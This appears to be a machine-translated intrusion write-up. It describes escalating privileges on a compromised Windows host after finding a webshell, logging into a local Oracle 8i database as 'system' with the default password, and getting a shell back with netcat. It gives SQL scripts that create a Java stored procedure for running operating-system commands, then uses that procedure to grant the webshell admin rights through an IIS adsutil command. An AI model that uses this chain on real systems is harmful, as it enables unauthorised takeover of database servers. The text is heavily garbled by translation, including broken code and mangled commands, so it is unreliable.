Privilege Escalation using the default password of the Oracle System Account

Recently, I visited a host and checked the configuration of the host. The host is still safe, but an upfile. asp is left in a hidden directory.

The results show a webshell easily.

Then I went around on the host and took out superscan. I scanned the host and opened port 80. I found a shortcut in the user \ Program directory.

Does firecontrol look like a hardware firewall console?

Webshell under the detection of the open service discovery General authorizable methods are not feasible without SERV-U and so on the host patch is also playing

I tried and passed an NC to get a shell, which is much more comfortable than in the Veteran's manager.

On disk C, you can see a directory in Oracle. The C: \ oracle \ ora81 \ Network \ admin \ tnsnames. ora file determines the service name of the host.

Xxx looked at the following version of Oracle 8i with the Database Connector provider = msdaora.1; Password = manager; user id = system; Data

Source = XXXX try the default system account password manager and the result is actually connected to the local Oracle service.

Now, the Oracle system account is like the SA under MSSQL. We can use it to escalate permissions.

I edited several scripts now.

1. SQL

Create or replace and compile
Java source named "util"
As
Import java. Io .*;
Import java. Lang .*;
Public class util extends object
{
Public static int runthis (string ARGs)
{
Runtime RT = runtime. getruntime ();
Int rc =-1;
Try
{
PROCESS p = rt.exe C (ARGs );
Int bufsize = 4096;
Bufferedinputstream Bis =
New bufferedinputstream (P. getinputstream (), bufsize );
Int Len;
Byte buffer [] = new byte [bufsize];
// Echo back what the program spit out
While (LEN = bis. Read (buffer, 0, bufsize ))! =-1)
System. Out. Write (buffer, 0, Len );
Rc = P. waitfor ();
}
Catch (exception E)
{
E. printstacktrace ();
Rc =-1;
}
Finally
{
Return RC;
}
}
}

---------------------------------------

2. SQL

Create or replace
Function run_cmd (p_cmd in varchar2) return number
As
Language Java
Name 'util. runthis (Java. Lang. String) return integer ';
-------------------------------------

3. SQL

Create or replace procedure RC (p_cmd in varchar2)
As
X number;
Begin
X: = run_cmd (p_cmd );
End;
---------------------------------

Save in c: \

Then run sqlplus system/manager at XXX with the reverse connection shell.

Then execute the script again.

SQL> @ C: \ 1 dot SQL

SQL> at c: \ 2 dot SQL

SQL> at c: \ 3 dot SQL

You can see that the Java function has been created and the function has been created.

Continue

SQL> variable X number;
SQL> set serveroutput on
SQL & gt; Exec dbms_java.set_output (100000 );
SQL> grant policyspriv to System

Authorization successful

Then we can execute the system command. I want to add ASP. DLL to the special permission group first.

SQL> Exec: = run_cmd ('cscript adsutil. vbs set/w3svc/inprocessisapiapps "C: \ winnt \ system32 \ inetsrv \ ASP. dll "');

We can see that the process has been successfully completed. At this time, we re-log on to our webshell, which has the admin permission.

Then, use NC to return a shell which is already a management permission. We can do what we want to do, because the host has a firewall to filter.

A backdoor with no ports other than 80 is not good for graphics. Only a webshell with permissions is successfully elevation of permission.